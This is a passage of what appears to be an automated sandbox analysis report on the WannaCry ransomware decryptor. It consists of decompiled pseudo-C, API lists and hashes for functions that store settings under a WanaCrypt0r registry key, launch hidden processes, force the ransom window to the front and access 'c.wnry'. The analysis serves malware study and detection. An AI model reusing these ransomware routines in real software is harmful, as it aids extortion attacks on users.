                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringExitFindFocusForegroundProcessShow
                                  • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                  • API String ID: 3942368781-2594244635
                                  • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                  • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 129 407a90-407ab7 130 407bf4-407c28 #2385 129->130 131 407abd-407ac5 129->131 132 407ac7 131->132 133 407aca-407ad1 131->133 132->133 133->130 134 407ad7-407af9 call 404c40 #2514 133->134 137 407b72-407bef #2414 * 2 #800 #641 134->137 138 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 134->138 137->130 138->137
                                  C-Code - Quality: 68%
                                  			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                  				char _v4;
                                  				char _v8;
                                  				char _v20;
                                  				intOrPtr _v24;
                                  				char _v32;
                                  				void* _v36;
                                  				char _v44;
                                  				char _v132;
                                  				char* _v136;
                                  				void* _v140;
                                  				void* _v144;
                                  				void* _v148;
                                  				void* _v152;
                                  				char _v160;
                                  				intOrPtr _v164;
                                  				char _v168;
                                  				void* _v180;
                                  				intOrPtr _t42;
                                  				intOrPtr _t43;
                                  				void* _t44;
                                  				void* _t70;
                                  				intOrPtr _t72;
                                  				intOrPtr _t73;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413F17);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t72;
                                  				_t73 = _t72 - 0x80;
                                  				_t70 = __ecx;
                                  				if(_a4 == 0x1388) {
                                  					_t43 = __ecx + 0x2f8;
                                  					if(_t43 != 0) {
                                  						_t43 =  *((intOrPtr*)(_t43 + 0x20));
                                  					}
                                  					if(_a8 == _t43) {
                                  						_t44 = E00404C40( &_v132, 0);
                                  						_v8 = 0;
                                  						L00412B72();
                                  						if(_t44 == 1) {
                                  							_push("***");
                                  							L00412CAA();
                                  							_push("\t");
                                  							_v8 = 1;
                                  							L00412F68();
                                  							_push( &_v44);
                                  							L00412F62();
                                  							_push(0x3b);
                                  							_push(0xa);
                                  							L00412F5C();
                                  							_push(0x3b);
                                  							_push(0xd);
                                  							L00412F5C();
                                  							_push(1);
                                  							_v164 = _t73;
                                  							L00412F56();
                                  							E004082C0(_t70,  &_v168,  &_v160);
                                  							_v44 = 0;
                                  							L00412CC2();
                                  						}
                                  						_v4 = 2;
                                  						_v20 = 0x415c00;
                                  						_v136 =  &_v20;
                                  						_v4 = 5;
                                  						L00412D52();
                                  						_v20 = 0x415bec;
                                  						_v136 =  &_v32;
                                  						_v32 = 0x415c00;
                                  						_v4 = 6;
                                  						L00412D52();
                                  						_v32 = 0x415bec;
                                  						_v4 = 2;
                                  						L00412CC2();
                                  						_v4 = 0xffffffff;
                                  						L00412C86();
                                  					}
                                  				}
                                  				_t42 = _a8;
                                  				_push(_a12);
                                  				_push(_t42);
                                  				_push(_a4);
                                  				L00412BAE(); // executed
                                  				 *[fs:0x0] = _v24;
                                  				return _t42;
                                  			}



























                                  APIs
                                  • #2514.MFC42 ref: 00407AF1
                                  • #537.MFC42(***), ref: 00407B04
                                  • #941.MFC42(00421234,***), ref: 00407B1A
                                  • #939.MFC42(?,00421234,***), ref: 00407B28
                                  • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                  • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                  • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                  • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                  • #2385.MFC42(?,?,?), ref: 00407C0E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                  • String ID: ***$[A$[A
                                  • API String ID: 3659526348-3419262722
                                  • Opcode ID: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                  • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                  • Opcode Fuzzy Hash: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                  • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 141 4063a0-4064b5 #2302 * 12 #2370 * 3
                                  APIs
                                  • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                  • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                  • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                  • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                  • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                  • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
                                  • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                  • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                  • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                  • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                  • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                  • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                  • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                  • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                  • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2302$#2370
                                  • String ID:
                                  • API String ID: 1711274145-0
                                  • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
                                  • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 142 401c70-401cd8 wcscat 143 401cdc-401cde 142->143 144 401ce0-401cef 143->144 145 401cf1-401cfb 143->145 146 401d00-401d0c RegCreateKeyW 144->146 145->146 147 401d12-401d1b 146->147 148 401dad-401db5 146->148 149 401d62-401d8e RegQueryValueExA 147->149 150 401d1d-401d60 GetCurrentDirectoryA RegSetValueExA 147->150 148->143 151 401dbb-401dc7 148->151 152 401d9e-401dab RegCloseKey 149->152 153 401d90-401d98 SetCurrentDirectoryA 149->153 150->152 152->148 154 401dc8-401dd7 152->154 153->152
                                  C-Code - Quality: 84%
                                  			E00401C70(signed int _a4) {
                                  				void _v519;
                                  				char _v520;
                                  				void _v700;
                                  				short _v720;
                                  				int _v724;
                                  				void* _v728;
                                  				int _t30;
                                  				void* _t36;
                                  				signed int _t38;
                                  				signed int _t46;
                                  				signed int _t56;
                                  				int _t72;
                                  				void* _t77;
                                  
                                  				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
                                  				_v520 = _t30;
                                  				memset( &_v519, _t30, 0x81 << 2);
                                  				asm("stosw");
                                  				asm("stosb");
                                  				_v728 = 0;
                                  				wcscat( &_v720, L"WanaCrypt0r");
                                  				_t72 = 0;
                                  				_v724 = 0;
                                  				do {
                                  					if(_t72 != 0) {
                                  						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
                                  					} else {
                                  						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
                                  					}
                                  					_t36 = _v728;
                                  					if(_t36 == 0) {
                                  						goto L10;
                                  					} else {
                                  						_t56 = _a4;
                                  						if(_t56 == 0) {
                                  							_v724 = 0x207;
                                  							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
                                  							asm("sbb esi, esi");
                                  							_t77 =  ~_t38 + 1;
                                  							if(_t77 != 0) {
                                  								SetCurrentDirectoryA( &_v520);
                                  							}
                                  						} else {
                                  							GetCurrentDirectoryA(0x207,  &_v520);
                                  							asm("repne scasb");
                                  							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
                                  							_t72 = _v724;
                                  							asm("sbb esi, esi");
                                  							_t77 =  ~_t46 + 1;
                                  						}
                                  						RegCloseKey(_v728); // executed
                                  						if(_t77 != 0) {
                                  							return 1;
                                  						} else {
                                  							goto L10;
                                  						}
                                  					}
                                  					L13:
                                  					L10:
                                  					_t72 = _t72 + 1;
                                  					_v724 = _t72;
                                  				} while (_t72 < 2);
                                  				return 0;
                                  				goto L13;
                                  			}

















                                  APIs
                                  • wcscat.MSVCRT ref: 00401CC1
                                  • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                  • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                  • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                  • RegQueryValueExA.KERNELBASE ref: 00401D81
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                  • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                  • String ID: Software\$WanaCrypt0r
                                  • API String ID: 3883271862-1723423467
                                  • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                  • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 155 4085c0-408652 #567 #341 GetSysColor * 4 KiUserCallbackDispatcher 156 408660-4086a6 #6140 155->156 157 408654-408658 155->157 157->156 158 40865a-40865e GetSysColor 157->158 158->156
                                  C-Code - Quality: 83%
                                  			E004085C0(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v16;
                                  				long _v20;
                                  				void _v24;
                                  				intOrPtr _v28;
                                  				int _t33;
                                  				intOrPtr _t50;
                                  				long _t53;
                                  				intOrPtr _t55;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413FF3);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t55;
                                  				_t50 = __ecx;
                                  				_v16 = __ecx;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx)) = 0x4157f0;
                                  				_v4 = 0;
                                  				L00412F74();
                                  				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x78)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x80)) = 0;
                                  				_v4 = 1;
                                  				 *((intOrPtr*)(__ecx)) = 0x4161a4;
                                  				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
                                  				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
                                  				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
                                  				_t53 = GetSysColor(2);
                                  				_v20 = _t53;
                                  				_v24 = 0;
                                  				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
                                  				if(_t33 != 0 && _v24 != 0) {
                                  					_t53 = GetSysColor(0x1b);
                                  				}
                                  				_push(0xffffffff);
                                  				_push(2);
                                  				L00412F50();
                                  				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
                                  				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
                                  				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
                                  				 *((intOrPtr*)(_t50 + 0x68)) = 0;
                                  				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
                                  				 *((intOrPtr*)(_t50 + 0x54)) = 0;
                                  				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
                                  				 *[fs:0x0] = _v20;
                                  				return _t50;
                                  			}













                                  APIs
                                  • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                  • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                  • GetSysColor.USER32 ref: 0040861D
                                  • GetSysColor.USER32(00000009), ref: 00408624
                                  • GetSysColor.USER32(00000012), ref: 0040862B
                                  • GetSysColor.USER32(00000002), ref: 00408632
                                  • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                  • GetSysColor.USER32(0000001B), ref: 0040865C
                                  • #6140.MFC42(00000002,000000FF), ref: 00408667
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Color$#341#567#6140CallbackDispatcherUser
                                  • String ID:
                                  • API String ID: 2603677082-0
                                  • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                  • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
                                  				struct HWND__* _t4;
                                  				struct HWND__* _t15;
                                  
                                  				_t4 = FindWindowW(0, _a4); // executed
                                  				_t15 = _t4;
                                  				if(_t15 != 0) {
                                  					ShowWindow(_t15, 5);
                                  					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
                                  					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                  					SetForegroundWindow(_t15);
                                  					SetFocus(_t15);
                                  					SetActiveWindow(_t15);
                                  					BringWindowToTop(_t15);
                                  					_t4 = _a8;
                                  					if(_t4 != 0) {
                                  						ExitProcess(0);
                                  					}
                                  				}
                                  				return _t4;
                                  			}






                                  APIs
                                  • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                  • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                  • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                  • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                  • SetForegroundWindow.USER32(00000000), ref: 0040B663
                                  • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                  • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                  • BringWindowToTop.USER32(00000000), ref: 0040B678
                                  • ExitProcess.KERNEL32 ref: 0040B689
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$ActiveBringExitFindFocusForegroundProcessShow
                                  • String ID:
                                  • API String ID: 962039509-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 163 401a90-401aeb CreateProcessA 164 401b45-401b4c 163->164 165 401aed-401af3 163->165 166 401af5-401b03 WaitForSingleObject 165->166 167 401b26-401b44 CloseHandle * 2 165->167 168 401b12-401b18 166->168 169 401b05-401b0c TerminateProcess 166->169 168->167 170 401b1a-401b20 GetExitCodeProcess 168->170 169->168 170->167
                                  C-Code - Quality: 100%
                                  			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
                                  				struct _STARTUPINFOA _v68;
                                  				struct _PROCESS_INFORMATION _v84;
                                  				void* _t21;
                                  				int _t23;
                                  				long _t25;
                                  				DWORD* _t30;
                                  
                                  				_v68.cb = 0x44;
                                  				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
                                  				_v84.hThread = _t21;
                                  				_v84.dwProcessId = _t21;
                                  				_v84.dwThreadId = _t21;
                                  				_v84.hProcess = 0;
                                  				_v68.dwFlags = 1;
                                  				_v68.wShowWindow = 0;
                                  				_t23 = CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84); // executed
                                  				if(_t23 == 0) {
                                  					return 0;
                                  				} else {
                                  					_t25 = _a8;
                                  					if(_t25 != 0) {
                                  						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
                                  							TerminateProcess(_v84.hProcess, 0xffffffff);
                                  						}
                                  						_t30 = _a12;
                                  						if(_t30 != 0) {
                                  							GetExitCodeProcess(_v84.hProcess, _t30);
                                  						}
                                  					}
                                  					CloseHandle(_v84);
                                  					CloseHandle(_v84.hThread);
                                  					return 1;
                                  				}
                                  			}










                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                  • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                  • String ID: D
                                  • API String ID: 786732093-2746444292
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 171 401a10-401a18 172 401a21 171->172 173 401a1a-401a1f 171->173 174 401a26-401a38 fopen 172->174 173->174 175 401a3a-401a44 174->175 176 401a6f-401a73 174->176 177 401a53-401a58 fwrite 175->177 178 401a46-401a51 fread 175->178 179 401a5e-401a64 177->179 178->179 180 401a74-401a84 fclose 179->180 181 401a66-401a6c fclose 179->181 181->176
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fclose$fopenfreadfwrite
                                  • String ID: c.wnry
                                  • API String ID: 2140422903-3240288721
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 182 4043e0-404408 #4284 #3874 #5277
                                  C-Code - Quality: 50%
                                  			E004043E0(void* __ecx) {
                                  				void* _t3;
                                  
                                  				_push(1);
                                  				_push(0x100);
                                  				_push(0);
                                  				L00412DDC();
                                  				_t3 = __ecx + 0x40;
                                  				_push(_t3); // executed
                                  				L00412DD6(); // executed
                                  				 *((char*)(__ecx + 0x5a)) = 0;
                                  				L00412C14();
                                  				return _t3;
                                  			}





                                  APIs
                                  • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                  • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                  • #5277.MFC42 ref: 00404402
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3874#4284#5277
                                  • String ID:
                                  • API String ID: 1717392697-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 183 4133e6-4133fb #1576
                                  C-Code - Quality: 28%
                                  			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                  
                                  				_t1 =  &_a16; // 0x413236
                                  				_push( *_t1);
                                  				_push(_a12);
                                  				_push(_a8);
                                  				_push(_a4);
                                  				L0041343E(); // executed
                                  				return __eax;
                                  			}




                                  APIs
                                  • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1576
                                  • String ID: 62A
                                  • API String ID: 1976119259-856450375
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

